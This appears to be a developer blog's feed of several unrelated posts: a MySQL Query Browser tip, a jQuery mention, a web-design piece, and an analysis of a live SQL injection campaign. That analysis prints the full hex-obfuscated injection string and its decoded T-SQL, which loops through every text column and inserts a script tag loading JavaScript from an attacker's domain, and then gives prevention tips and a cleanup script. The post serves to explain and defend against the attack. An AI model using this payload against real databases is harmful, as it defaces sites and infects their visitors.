Devit!

After reading a blog post called “Generate Change Script for SQL Modifications” for MSSQL Management Studio, we wanted to show how to do this same task for MySQL using the MySQL Query Browser.

1. Open the Query Browser and right click on the table you need to modify.
2. Select Edit Table from the context menu. You will be presented with the MySQL Table Editor.  This gives you a graphical interface for modifying your table structure.
3. Modify the table in whatever way you wish.

   Some examples…
   - change field names, types, defaults
   - add indices, foreign keys
   - change the character sets and collation
   - change the auto increment value

4. Click Apply Changes at the bottom of the window. You will be presented with a confirmation box.  CHANGES HAVE NOT BEEN EXECUTED YET.  What’s great is that it gives you the code that it will use to modify the table.
5. Use your cursor to select the code and then copy it into whatever text editor you prefer.

Now you have a sql script that can be executed on multiple servers, or further modified by hand.

Update

If the attack has changed to a different URL simply replace the URL in the solution script below. That is assuming the rest of the syntax has not changed.

Hope that helps

A new SQL injection hack seems to be out in the wild from verynx.cn. The SQL Injection hack uses a CHAR array to hide its payload which will insert some various html garbage along with a reference to a javascript file on the verynx.cn domain that will infect users when they visit your website. Luckily the domain with the offending javascript file now points to 127.0.0.1 which will help stop the spread of the virus. Unfortunately the botnet still seems to be spamming websites with the scripted attack leaving many entirely broken or loading extremely slow as each page might have hundreds of requests to the payload.

The attack below works like this:

You have a web page like www.mywebsite.com/showproducts.aspx?categoryId=12. An attacker visits your website with SQL code appended to the number 12 in the sample URL provided. A simple attack would look like www.mywebsite.com/showproducts.aspx?categoryId=12;SELECT * from tblProducts;. As you can see the attacker is guessing at the table name and hoping to get all of the information dumped back to them when you pass the categoryId to the database. Below you can see a much more complicated attack where they’ve used a CHAR array and then used the CAST command to have your SQL Server convert the array so it can be executed.

Sample of Attack:

;DECLARE
%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535
292C4043207661263686172283430303029204445434C415245205461626C655F437572736F7220
435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D2073797
36F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420
616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747
970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50
454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F4
37572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D30
2920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432
B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D226874
74703A2F2F312E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D2727207
76865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C73637269
7074207372633D22687474703A2F2F312E766572796E782E636E2F772E6A7323E3C2F7363726970
743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F722
0494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C
4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);

Un-Obfuscated Attack:

;DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://1.verynx.cn/w.js"></script><!--'' where '+@C+' not like ''%"></title><script src="http://1.verynx.cn/w.js"></script><!--''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

Tips to prevent SQL Injection Hacks:

Do not trust user data. The easiest solution for resolving most issues with SQL Injections is to clean all incoming data. For any type of number or ID this is pretty easy as you can ensure any incoming number safely converts to a number (int for example) alternatively you can ensure other ID’s such as GUID’s convert safely to GUID’s before passing any information to your database.

Another simple fix – if you don’t need execute – ensure the user connecting to your database doesn’t have execute permissions.

Solution (Fixing your database after the attack):

Here we turn their code into the solution as we use the same process to loop through the entire database and remove what they’ve inserted into the database.

DECLARE @T varchar(255),@C varchar(4000)
DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
BEGIN exec('update ['+@T+'] set ['+@C+']=replace(['+@C+'],''"></title><script src="http://1.verynx.cn/w.js"></script><!--'','''')')
FETCH NEXT FROM Table_Cursor INTO @T,@C END
CLOSE Table_Cursor DEALLOCATE Table_Cursor

Additional Links:

All the details you need to understand SQL Injection: http://en.wikipedia.org

SQL Injection Cheat Sheet: http://ferruh.mavituna.com

SQL Injection Attack Detection Tools: http://52coding.com

Essential Security Considerations: http://nettuts.com

PHP+Mysql tips for preventing SQL injections: http://www.johnrockefeller.net

What to do if you’re still stuck:

Post your questions in the comments below and we will answer them as quickly as possible – also if anyone has any useful information we will update the article to share that information with others.

One of our favorite new tools in the last year would have to be jQuery – and we recently came across a great article that should help any developer unfamiliar with it get their hands and feet wet.

What is jQuery?
jQuery is an extremely robust library to help you code more efficiently and get more done with less work. (Honestly who would rather do more work when they can do less and achieve the same result) The key features of jQuery are its ability to utilize CSS Selectors, and chaining which essentially means when you call a function on an object jQuery always returns that object back to you. Oh and did we mention it also handles cross browser compatibility issues for you?

Check out this article from NETTUTS to get your feet wet and unleash the power of jQuery.

“Why do you need a website?”

In this second blog based on our Techalliance workshop on (re)designing corporate websites, we explore the first question we always ask our clients. It seems obvious, but you’d be surprised how many companies don’t have a clear answer prepared – which is interesting because the answer to this question is the foundation that informs every design, implementation and technology decision in the website creation process. Your website exists to help you achieve your goals, and defining what you want to accomplish is the first step in creating a site that works for you.

There are a lot of competing technologies and approaches in web design, and having a clear goal for your website is the best way to narrow the choices you’ll be making. Designing a website is a lot like reaching for a tool from a giant toolbox – you have to pick the right tool for the job. If you are trying to screw two pieces of wood together a hammer is a poor choice compared to a screwdriver. The requirements for a website that sells products are vastly different from an informational brochure site that simply serves to introduce the world to your company and brand.

Read the rest of this entry »